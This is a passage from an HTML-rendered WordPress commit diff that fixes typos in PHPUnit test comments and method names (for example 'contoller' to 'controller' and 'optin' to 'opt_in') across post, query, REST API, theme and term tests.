</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Custom post meta should NOT be restored, orignal value should not be restored, value still 'update1'.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Custom post meta should NOT be restored, original value should not be restored, value still 'update1'.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'update1', get_post_meta( $post_id, 'meta_revision_test', true ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> update_post_meta( $post_id, 'meta_revision_test', 'update2' );
</span></span></pre></div>
<a id="trunktestsphpunittestspostnavmenuphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/nav-menu.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/nav-menu.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/nav-menu.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -764,7 +764,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Run tests required to confrim Walker_Nav_Menu receives an $args object.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Run tests required to confirm Walker_Nav_Menu receives an $args object.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function confirm_nav_menu_item_args_object( $args ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertIsObject( $args );
</span></span></pre></div>
<a id="trunktestsphpunittestspostobjectsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/objects.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/objects.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/objects.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -28,7 +28,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'dummy', get_post_meta( $id, 'post_type', true ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'post', $post->post_type );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Excercise the output argument.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Exercise the output argument.
</ins><span class="cx" style="display: block; padding: 0 10px"> $post = get_post( $id, ARRAY_A );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertIsArray( $post );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'post', $post['post_type'] );
</span></span></pre></div>
<a id="trunktestsphpunittestspostqueryphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/query.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/query.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/query.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -725,9 +725,9 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $q->posts = $posts;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $methd = new ReflectionMethod( 'WP_Query', 'set_found_posts' );
- $methd->setAccessible( true );
- $methd->invoke( $q, array( 'no_found_rows' => false ), array() );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $method = new ReflectionMethod( 'WP_Query', 'set_found_posts' );
+ $method->setAccessible( true );
+ $method->invoke( $q, array( 'no_found_rows' => false ), array() );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $expected, $q->found_posts );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestsposttypesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/types.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/types.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/types.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -586,7 +586,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 34010
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_post_types_by_support_non_existant_feature() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_post_types_by_support_non_existent_feature() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSameSets( array(), get_post_types_by_support( 'somefeature' ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestspostwpAfterInsertPostphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/wpAfterInsertPost.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/wpAfterInsertPost.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/wpAfterInsertPost.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -166,7 +166,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_update_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_update_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::$post_id;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -184,7 +184,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_new_post_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_new_post_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $request = new WP_REST_Request( 'POST', sprintf( '/wp/v2/posts' ) );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -206,7 +206,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_update_attachment_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_update_attachment_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px"> $attachment_id = self::$attachment_id;
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsprivacywpPrivacyGeneratePersonalDataExportFilephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -61,7 +61,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Set up the test fixture.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Override `wp_die()`, pretend to be Ajax, and suppress `E_WARNING`s.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Override `wp_die()`, pretend to be Ajax, and suppress warnings.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 5.2.0
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsqueryinvalidQueriesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/query/invalidQueries.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/query/invalidQueries.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/query/invalidQueries.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -98,7 +98,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Test WP Query with an invalid post type in a mutiple post type query.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Test WP Query with an invalid post type in a multiple post type query.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 48556
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsquerysearchphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/query/search.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/query/search.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/query/search.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -280,7 +280,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_status' => 'publish',
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_title' => '0',
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_content' => 'this post contains zeroes',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'post_excerpt' => 'this post containts zeroes',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'post_excerpt' => 'this post contains zeroes',
</ins><span class="cx" style="display: block; padding: 0 10px"> )
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -408,7 +408,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Unfiltered search queries for attachment post types should not inlcude
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Unfiltered search queries for attachment post types should not include
</ins><span class="cx" style="display: block; padding: 0 10px"> * filenames to ensure the postmeta JOINs don't happen on the front end.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 22744
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestapplicationpasswordscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -848,7 +848,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Checks the password response matches the exepcted format.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Checks the password response matches the expected format.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 5.6.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestglobalstylesrevisionscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -590,13 +590,13 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Tests that the default query should fetch all revisions.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Duplicate of WP_Test_REST_Revisions_Controller::test_get_items_default_query_should_fetch_all_revisons
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Duplicate of WP_Test_REST_Revisions_Controller::test_get_items_default_query_should_fetch_all_revisions
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 58524
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers WP_REST_Global_Styles_Controller::get_items
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_items_default_query_should_fetch_all_revisons() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_items_default_query_should_fetch_all_revisions() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $expected_count = $this->total_revisions;
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestrevisionscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -668,7 +668,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 40510
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_items_default_query_should_fetch_all_revisons() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_items_default_query_should_fetch_all_revisions() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$editor_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $expected_count = $this->total_revisions;
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestserverphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-server.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-server.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-server.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2002,9 +2002,9 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 50244
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @dataProvider data_batch_v1_optin
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @dataProvider data_batch_v1_opt_in
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_batch_v1_optin( $allow_batch, $allowed ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_batch_v1_opt_in( $allow_batch, $allowed ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> $args = array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'methods' => 'POST',
</span><span class="cx" style="display: block; padding: 0 10px"> 'callback' => static function () {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2045,7 +2045,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function data_batch_v1_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function data_batch_v1_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'missing' => array( null, false ),
</span><span class="cx" style="display: block; padding: 0 10px"> 'invalid type' => array( true, false ),
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestthemescontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -934,7 +934,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_wp_block_styles_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_wp_block_styles_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'wp-block-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'wp-block-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -958,7 +958,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_align_wide_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_align_wide_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'align-wide' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'align-wide' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -982,7 +982,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_editor_styles_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_editor_styles_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'editor-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'editor-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1006,7 +1006,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_dark_editor_style_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_dark_editor_style_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'dark-editor-style' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'dark-editor-style' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span></span></pre></div>
<a id="trunktestsphpunittestsscriptmoduleswpScriptModulesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/script-modules/wpScriptModules.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/script-modules/wpScriptModules.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/script-modules/wpScriptModules.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -415,7 +415,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Tests that static dependencies of dynamic depenendencies are not preloaded.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Tests that static dependencies of dynamic dependencies are not preloaded.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 56313
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunktestsphpunittestssitemapssitemapsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/sitemaps/sitemaps.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/sitemaps/sitemaps.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/sitemaps/sitemaps.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -95,7 +95,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Helper function to get all sitemap entries data.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return array A list of sitemap entires.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return array A list of sitemap entries.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function _get_sitemap_entries() {
</span><span class="cx" style="display: block; padding: 0 10px"> $entries = array();
</span></span></pre></div>
<a id="trunktestsphpunitteststermcachephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/term/cache.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/term/cache.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/term/cache.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -55,7 +55,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 14485
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_hierachy_invalidation() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_hierarchy_invalidation() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $tax = 'burrito';
</span><span class="cx" style="display: block; padding: 0 10px"> register_taxonomy( $tax, 'post', array( 'hierarchical' => true ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertTrue( get_taxonomy( $tax )->hierarchical );
</span></span></pre></div>
<a id="trunktestsphpunitteststhemewpThemeJsonphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/theme/wpThemeJson.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/theme/wpThemeJson.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/theme/wpThemeJson.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -4754,7 +4754,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Tests the core separator block outbut based on various provided settings.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Tests the core separator block output based on various provided settings.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 56903
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 58550
</span></span></pre></div>
<a id="trunktestsphpunitteststhemephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/theme.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/theme.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/theme.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -322,7 +322,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> // Template file that doesn't exist.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $this->assertSame( '', get_query_template( 'nonexistant' ) );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $this->assertSame( '', get_query_template( 'nonexistent' ) );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> // Template files that do exist.
